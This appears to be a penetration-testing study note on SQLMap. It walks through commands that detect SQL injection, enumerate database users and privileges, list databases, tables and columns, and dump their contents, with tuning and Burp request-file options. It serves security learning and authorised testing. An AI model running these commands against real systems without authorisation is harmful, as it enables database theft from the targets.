# 5.4.6 SQLMap ## SQLMap SQLMap is a powerful open-source penetration testing tool designed to automate the process of detecting and exploiting SQL injection flaws in web applications. It simplifies the identification and exploitation of SQL vulnerabilities, making it a widely used tool in the field of penetration testing. ### **Basic Syntax** * **Detecting SQL Injection:** To use SQLMap, provide the tool with the vulnerable URL and the parameter to test for SQL injection. For example: ``` $ sqlmap -u "http://victim.site/view.php?id=1141" -p id --technique=U ``` This command tells SQLMap to test the `id` parameter of a GET request for `view.php` using a Union-based SQL injection technique. * **Handling POST Parameters:** If the injection involves a POST parameter, the syntax would be: ``` $ sqlmap -u --data= -p parameter [options] ``` You can write the POST string manually or copy it from a request intercepted with Burp Proxy. * **Using Request Files:** Save a request intercepted with Burp Proxy to a file and specify it on the command line: ``` $ sqlmap -r -p parameter [options] ``` ### **Extracting Information** * **Database Banner:** The `--banner` switch helps in grabbing the database banner to test injection and include proof of exploitability in reports: ``` $ sqlmap -u --banner ``` * **Information Gathering:** * List users of the database: ``` $ sqlmap -u --users ``` * Check if the web application database user is a database administrator: ``` $ sqlmap -u --is-dba ``` * **Database and Schema Extraction:** * List all available databases: ``` $ sqlmap -u --dbs ``` * Choose a database and list its tables: ``` $ sqlmap -u -D --tables ``` * Choose tables and list their columns: ``` $ sqlmap -u -D -T --columns ``` * Dump specific columns: ``` $ sqlmap -u -D -T -C --dump ``` ### **SQLMap Advanced Usage** * **Forcing the DBMS:** Specify the DBMS to help shorten the detection phase: ``` $ sqlmap --dbms= ... ``` Available DBMS options include MySQL, Oracle, PostgreSQL, Microsoft SQL Server, and more. * **Fine-Tuning Payloads:** Use `--string` and `--not-string` to handle changes in application output. For example: ``` $ sqlmap -u 'http://localhost/ecommerce.php?id=1' --string "nokia" ``` Utilize `--prefix` and `--suffix` for structured POST parameters. * **Aggressiveness and Load:** * Use `--level` to test headers and increase the number of columns tested for in-band exploitation. * Use `--risk` to adjust the aggressiveness of injections. Higher risk levels enable more dangerous injections. * **Connection Management:** * Use `--keep-alive` for persistent connections: ``` $ sqlmap -u --keep-alive ``` * Use `--threads` to exploit injections with parallel threads: ``` $ sqlmap -u --technique=8 --threads 7 ``` * SQL Injections are powerful but can be destructive; hence, ethical hacking requires careful consideration. * Understanding the tools and their options is crucial for successful and responsible penetration testing. * SQLMap provides advanced command-line switches for fine-tuning and optimizing the exploitation process. * Always exercise caution to avoid damaging the client's infrastructure and follow ethical hacking practices. ### BurpSuite & SQLMap A great way to find out if a SQLi vulnerability is present is to use a web proxy such as BurpSuite, capture the traffic, and save the captured file locally (.xml). We will then open that file with SQLMap and check for vulnerabilities or not. ```bash sqlmap -r sql_request_captured.xml ``` {% content-ref url="" %} [SQLMap](https://app.gitbook.com/s/iS3hadq7jVFgSa8k5wRA/practical-ethical-hacker-notes/tools/sqlmap) {% endcontent-ref %}